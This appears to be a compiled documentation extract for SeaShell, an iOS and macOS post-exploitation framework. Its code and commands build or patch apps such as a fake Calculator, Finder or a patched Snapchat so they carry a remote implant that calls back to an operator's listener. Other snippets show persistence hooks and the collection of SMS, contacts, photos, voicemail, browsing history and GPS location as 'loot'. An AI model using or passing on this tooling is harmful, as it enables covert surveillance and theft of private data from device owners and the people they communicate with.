### Install SeaShell Framework Source: https://context7.com/entysec/seashell/llms.txt Install the SeaShell framework using pip. To update, use the --force-reinstall flag. ```bash pip3 install git+https://github.com/EntySec/SeaShell ``` ```bash pip3 install --force-reinstall git+https://github.com/EntySec/SeaShell ``` -------------------------------- ### Initialize and Use Config Class Source: https://context7.com/entysec/seashell/llms.txt Instantiate the Config class and call setup() to create necessary directories. Access standard filesystem paths via attributes like user_path and loot_path. ```python from seashell.lib.config import Config cfg = Config() cfg.setup() # creates ~/.seashell/ and ~/.seashell/loot/ if missing print(cfg.user_path) # ~/.seashell/ print(cfg.data_path) # /seashell/data/ print(cfg.modules_path) # /seashell/modules/ print(cfg.plugins_path) # /seashell/plugins/ print(cfg.commands_path) # /seashell/commands/ print(cfg.loot_path) # ~/.seashell/loot/ print(cfg.history_path) # ~/.seashell/history.txt ``` -------------------------------- ### Install SeaShell Framework Source: https://github.com/entysec/seashell/blob/main/README.md Install the SeaShell Framework using pip. This command fetches the latest version directly from the GitHub repository. ```shell pip3 install git+https://github.com/EntySec/SeaShell ``` -------------------------------- ### Start and Use RPC Server for Remote Console Commands Source: https://context7.com/entysec/seashell/llms.txt Starts a JSON-RPC 2.0 server that exposes console commands with an `rpc()` method over the network. Allows remote execution of commands like 'devices' and 'ipa'. Requires jsonrpclib. ```python # Start the RPC server from the SeaShell console: # (seashell)> rpc -p 1006 # Then call it remotely via JSON-RPC: import jsonrpclib server = jsonrpclib.Server('http://127.0.0.1:1006') # List connected devices devices = server.devices('list') # => {0: {'host': '192.168.1.55', 'port': '8888', 'platform': 'iphoneos', ...}} # Build a new IPA remotely server.ipa('build', '/tmp/', '192.168.1.10', '8888') # Patch an existing IPA remotely server.ipa('patch', '/tmp/App.ipa', '192.168.1.10', '8888') ``` -------------------------------- ### Start TCP Listener via Console Command Source: https://context7.com/entysec/seashell/llms.txt Starts a background TCP listener job on the specified port. Prevents duplicate listener starts on the same port. Can specify interface with -L. ```bash # In the SeaShell interactive console: # Start listener on all interfaces, port 8888 (seashell)> listener -p 8888 # Start listener on a specific interface (seashell)> listener -L 192.168.1.10 -p 8888 # [*] Listening on TCP port 8888... # [+] New device connected - 192.168.1.55! # [i] Type devices list to list all connected devices. # [i] Type devices -i 0 to interact this device. # Kill the listener (seashell)> listener -p 8888 -k # [*] Killing TCP listener on port 8888... ``` -------------------------------- ### Start TCP Listener and Handle Device Connection Source: https://context7.com/entysec/seashell/llms.txt Initiates a TCP listener to accept incoming Pwny sessions, wraps the socket into a PwnySession, and returns a fully initialized Device object. Device objects expose high-level operations over the established session. Requires DeviceHandler and Device imports. ```python from seashell.core.device import DeviceHandler, Device # Start TCP listener and accept one device handler = DeviceHandler(host='0.0.0.0', port=8888, timeout=30) handler.start() # => [*] Listening on TCP port 8888... device = handler.handle() # blocks until a device connects # => [+] New device connected - 192.168.1.55! # Retrieve device info (iOS only) device.update_details() print(device.name) # => "John's iPhone" print(device.os) # => "iOS 16.1.2" print(device.model) # => "iPhone14,2" print(device.serial) # => "F2LXQ..." print(device.udid) # => "00008110-..." # Get GPS coordinates (iOS only) lat, lon = device.locate() print(lat, lon) # => "37.7749" "-122.4194" # Open interactive Pwny shell session device.interact() # Tear down the connection device.kill() ``` -------------------------------- ### Save, Retrieve, and List Loot Files Source: https://context7.com/entysec/seashell/llms.txt Manage collected data (loot) using the loot module. Save raw bytes, retrieve specific files by name, generate random filenames, get the full path to named files, or list all collected loot. ```python loot.save_loot('sms.db', open('/tmp/sms.db', 'rb').read()) ``` ```python data = loot.get_loot('sms.db') ``` ```python path = loot.random_loot(extension='db') ``` ```python path = loot.specific_loot('AddressBook.sqlitedb') ``` ```python for name, path, mtime in loot.list_loot(): print(name, path, mtime) ``` -------------------------------- ### Build Mussel Application Source: https://github.com/entysec/seashell/blob/main/Mussel/apple_ios/README.md Use the 'make' command with options to build the application bundle or IPA file. 'all' builds the application bundle, and 'ipa' builds the IPA file from the bundle. ```bash make all ``` ```bash make ipa ``` -------------------------------- ### Initialize and Run the SeaShell Console Source: https://context7.com/entysec/seashell/llms.txt Initializes the top-level REPL for the SeaShell framework, which counts modules and plugins, displays a banner and tip, and enters the command loop. Requires Console import. ```python from seashell.core.console import Console console = Console() console.console() # Clears screen, prints ASCII banner, shows: # --=[ SeaShell Framework 1.0.0 # --==--[ Developed by EntySec (https://entysec.com/) # --=[ 8 modules | 0 plugins # [i] Tip: Use 'listener -p 8888' to start a TCP listener. # (seashell)> ``` -------------------------------- ### SeaShell CLI Entry Point Source: https://context7.com/entysec/seashell/llms.txt Launch the interactive console or build/patch an IPA using command-line flags. Specify host, port, name, bundle ID, and output path for IPA generation, or provide an existing IPA for patching. ```bash seashell ``` ```bash seashell --ipa --host 192.168.1.10 --port 8888 \ --name "Calculator" \ --bundle com.apple.calculator \ -o /tmp/output/ ``` ```bash seashell --ipa --host 192.168.1.10 --port 8888 -i /tmp/original.ipa ``` -------------------------------- ### Build, Patch, and Check IPA Files via Console Command Source: https://context7.com/entysec/seashell/llms.txt Provides an interactive wizard for building, patching, and checking IPA files. Requires user input for application details, host, port, and file paths. Can also be accessed programmatically via RPC. ```bash (seashell)> ipa -b # Application name (Mussel): Calculator # Bundle ID (com.entysec.mussel): com.apple.calculator # Add application icon [y/N]: y # Icon file path: /tmp/calc.png # Host to connect back (192.168.1.10): 192.168.1.10 # Port to connect back (8888): 8888 # Path to save the IPA: /tmp/ # [+] IPA saved to /tmp/Calculator.ipa! (seashell)> ipa -p /tmp/Snapchat.ipa # Host to connect back (192.168.1.10): 192.168.1.10 # Port to connect back (8888): 8888 # [+] IPA at /tmp/Snapchat.ipa patched! (seashell)> ipa -c /tmp/Calculator.ipa # [i] IPA is built or patched. ``` -------------------------------- ### SeaShell CLI Entry Point Source: https://context7.com/entysec/seashell/llms.txt The `seashell` command-line interface allows for launching the interactive console or directly generating/patching IPAs with embedded implants. ```APIDOC ## SeaShell CLI Entry Point The `seashell` command-line interface supports two modes: interactive console mode and direct IPA generation/patching mode via command-line flags. ### Usage Examples: ```bash # Launch the interactive console seashell # Build a new IPA with embedded implant connecting back to 192.168.1.10:8888 seashell --ipa --host 192.168.1.10 --port 8888 \ --name "Calculator" \ --bundle com.apple.calculator \ -o /tmp/output/ # Patch an existing IPA to embed the implant seashell --ipa --host 192.168.1.10 --port 8888 -i /tmp/original.ipa ``` ``` -------------------------------- ### Manage Connected Devices via Console Command Source: https://context7.com/entysec/seashell/llms.txt Lists all connected devices, interacts with a device by ID (opening the Pwny shell), or kills a specific device connection. Use -l to list, -i to interact, and -k to kill. ```bash (seashell)> devices -l Connected Devices ID Host Port Platform -- ---- ---- -------- 0 192.168.1.55 8888 iphoneos # Interact with device 0 (opens Pwny session shell) (seashell)> devices -i 0 # [*] Interacting with device 0... # (pwny)> # Kill device 0 (seashell)> devices -k 0 ``` -------------------------------- ### Retrieve Device Hardware Info via TLV API Source: https://context7.com/entysec/seashell/llms.txt Directly retrieve device hardware information using TLV commands through a Pwny session. Requires importing specific constants from seashell.core.api. ```python from seashell.core.api import ( GATHER_GET_INFO, GATHER_NAME, GATHER_OS, GATHER_MODEL, GATHER_SERIAL, GATHER_UDID, ) result = session.send_command(tag=GATHER_GET_INFO) print(result.get_string(GATHER_NAME)) # => "John's iPhone" print(result.get_string(GATHER_OS)) # => "16.1.2" print(result.get_string(GATHER_MODEL)) # => "iPhone14,2" print(result.get_string(GATHER_SERIAL)) # => "F2LXQ..." print(result.get_string(GATHER_UDID)) # => "00008110-..." ``` -------------------------------- ### Initialize Loot Storage Management Source: https://context7.com/entysec/seashell/llms.txt Initializes the Loot utility class for managing files collected from compromised devices. Loot is stored in `~/.seashell/loot/` and provides access to collected artefacts. ```python from seashell.lib.loot import Loot loot = Loot() ``` -------------------------------- ### App Class for macOS Application Bundle Generation Source: https://context7.com/entysec/seashell/llms.txt Generate a macOS .app bundle (zipped) with the Mussel implant embedded. Mirrors the IPA API for consistency. Specify host, port, name, and optionally an icon path. ```python from seashell.core.app import App app = App(host='192.168.1.10', port=8888) app.set_name('Finder', 'com.apple.finder') app.set_icon('/path/to/icons.icns') # optional output_path = app.generate('/tmp/output/') print(f"App bundle saved to: {output_path}") # => App bundle saved to: /tmp/output/Finder.zip ``` -------------------------------- ### App Class - macOS Application Bundle Generator Source: https://context7.com/entysec/seashell/llms.txt The `App` class generates a macOS `.app` bundle (zipped) with the Mussel implant embedded, targeting macOS 10.0+. It mirrors the `IPA` API for consistency. ```APIDOC ## `App` Class — macOS Application Bundle Generator `seashell/core/app.py` — Generates a macOS `.app` bundle (zipped) with the Mussel implant embedded, targeting macOS 10.0+. Mirrors the `IPA` API for consistency. ### Usage Examples: ```python from seashell.core.app import App app = App(host='192.168.1.10', port=8888) app.set_name('Finder', 'com.apple.finder') app.set_icon('/path/to/icons.icns') # optional output_path = app.generate('/tmp/output/') print(f"App bundle saved to: {output_path}") # => App bundle saved to: /tmp/output/Finder.zip ``` ``` -------------------------------- ### Hook Class - IPA Patcher Source: https://context7.com/entysec/seashell/llms.txt The `Hook` class injects the Mussel implant into an existing third-party IPA. It renames the original app executable and places a loader stub that launches the original app alongside the Pwny implant. ```APIDOC ## `Hook` Class — IPA Patcher `seashell/core/hook.py` — Injects the Mussel implant into an existing third-party IPA. The original app executable is renamed to `.hooked`; a loader stub (`hook`) is placed in its position, which calls `posix_spawn()` to launch the original app alongside the Pwny implant (`mussel`). ### Usage Examples: ```python from seashell.core.hook import Hook # Patch an existing IPA to add the implant hook = Hook(host='192.168.1.10', port=8888) hook.patch_ipa('/tmp/Snapchat.ipa') # => Patching /tmp/Snapchat.ipa [animated progress bar] # The original IPA is replaced in-place with the patched version. # Utility: read CFBundleExecutable from a plist executable = Hook.get_executable('/tmp/Payload/App.app/Info.plist') print(executable) # => 'Snapchat' # Utility: patch plist to embed callback hash (or revert) hook.patch_plist('/tmp/Payload/App.app/Info.plist', revert=False) hook.patch_plist('/tmp/Payload/App.app/Info.plist', revert=True) # restore '????' ``` ``` -------------------------------- ### Photos Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Download photos from an iOS device. Supports downloading both on-device photos (DCIM) and iCloud photos (CPLAssets) to a specified local directory. ```shell photos local /tmp/photos/ ``` ```shell photos icloud /tmp/icloud_photos/ ``` -------------------------------- ### Retrieve GPS Location via TLV API Source: https://context7.com/entysec/seashell/llms.txt Obtain the device's GPS coordinates using TLV commands through a Pwny session. Requires importing specific constants for latitude and longitude. ```python from seashell.core.api import ( LOCATE_GET, LOCATE_LONGITUDE, LOCATE_LATITUDE ) result = session.send_command(tag=LOCATE_GET) lat = result.get_string(LOCATE_LATITUDE) lon = result.get_string(LOCATE_LONGITUDE) print(f"Device is at {lat}, {lon}") ``` -------------------------------- ### IPA Class for iOS Application Archive Generation Source: https://context7.com/entysec/seashell/llms.txt Generate a signable .ipa file with the Mussel implant. The callback URL is embedded in Info.plist. Use check_ipa to verify if an IPA was patched by SeaShell. ```python from seashell.core.ipa import IPA # Build a fresh IPA that calls back to 192.168.1.10:8888 ipa = IPA(host='192.168.1.10', port=8888) ipa.set_name('Calculator', 'com.apple.calculator') ipa.set_icon('/path/to/custom_icon.png') # optional; defaults to bundled AppIcon.png output_path = ipa.generate('/tmp/output/') print(f"IPA saved to: {output_path}") # => IPA saved to: /tmp/output/Calculator.ipa # Verify an existing IPA was built/patched by SeaShell is_infected = IPA(None, None).check_ipa('/tmp/output/Calculator.ipa') print(is_infected) # => True ``` -------------------------------- ### Safari Bookmarks Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Retrieve Safari bookmarks from an iOS device. Displays the title and URL of each bookmark. Can be exported to a JSON file. ```shell safari_bookmarks ``` ```shell safari_bookmarks /tmp/bookmarks.json ``` -------------------------------- ### Hook Class for IPA Patching Source: https://context7.com/entysec/seashell/llms.txt Inject the Mussel implant into an existing third-party IPA. The original executable is renamed, and a loader stub is placed to launch the original app alongside the implant. Utilities are provided to read executables from plists and patch plists. ```python from seashell.core.hook import Hook # Patch an existing IPA to add the implant hook = Hook(host='192.168.1.10', port=8888) hook.patch_ipa('/tmp/Snapchat.ipa') # => Patching /tmp/Snapchat.ipa [animated progress bar] # The original IPA is replaced in-place with the patched version. # Utility: read CFBundleExecutable from a plist executable = Hook.get_executable('/tmp/Payload/App.app/Info.plist') print(executable) # => 'Snapchat' # Utility: patch plist to embed callback hash (or revert) hook.patch_plist('/tmp/Payload/App.app/Info.plist', revert=False) hook.patch_plist('/tmp/Payload/App.app/Info.plist', revert=True) # restore '????' ``` -------------------------------- ### IPA Class - iOS Application Archive Generator Source: https://context7.com/entysec/seashell/llms.txt The `IPA` class generates a complete, signable `.ipa` file containing the Mussel implant binary. The connection callback URL is embedded in the `CFBundleSignature` field of `Info.plist`. ```APIDOC ## `IPA` Class — iOS Application Archive Generator `seashell/core/ipa.py` — Generates a complete, signable `.ipa` file containing the Mussel implant binary. The connection callback URL (`tcp://host:port`) is base64-encoded and embedded in the `CFBundleSignature` field of `Info.plist` so the implant can read it at launch time. ### Usage Examples: ```python from seashell.core.ipa import IPA # Build a fresh IPA that calls back to 192.168.1.10:8888 ipa = IPA(host='192.168.1.10', port=8888) ipa.set_name('Calculator', 'com.apple.calculator') ipa.set_icon('/path/to/custom_icon.png') # optional; defaults to bundled AppIcon.png output_path = ipa.generate('/tmp/output/') print(f"IPA saved to: {output_path}") # => IPA saved to: /tmp/output/Calculator.ipa # Verify an existing IPA was built/patched by SeaShell is_infected = IPA(None, None).check_ipa('/tmp/output/Calculator.ipa') print(is_infected) # => True ``` ``` -------------------------------- ### Update SeaShell Framework Source: https://github.com/entysec/seashell/blob/main/README.md Update the SeaShell Framework to the latest version. This command ensures you have the most recent features and bug fixes by forcing a reinstallation. ```shell pip3 install --force-reinstall git+https://github.com/EntySec/SeaShell ``` -------------------------------- ### Safari History Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Access and display Safari browsing history from an iOS device. Can be displayed in the console or exported as a JSON file. ```shell safari_history ``` ```shell safari_history /tmp/history.json ``` -------------------------------- ### Hook Module for App Injection (iOS) Source: https://context7.com/entysec/seashell/llms.txt Injects the Mussel implant into a target application's container on an iOS device. This ensures the implant relaunches when the legitimate app is opened, providing persistence. ```shell hook Contacts ``` -------------------------------- ### Contacts Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Retrieve address book contacts from an iOS device. Displays forename, surname, and phone number. ```shell contacts ``` -------------------------------- ### SMS Messages Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Interact with SMS messages on an iOS device. List chat partners, save chat lists or conversations to JSON, or display SMS with a specific contact. ```shell sms -l ``` ```shell sms -l /tmp/chats.json ``` ```shell sms +14155551234 ``` ```shell sms +14155551234 /tmp/chat.json ``` -------------------------------- ### Voicemail Module (iOS) Source: https://context7.com/entysec/seashell/llms.txt Access voicemail records from an iOS device. Displays sender, duration, and date of voicemails. ```shell voicemail ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.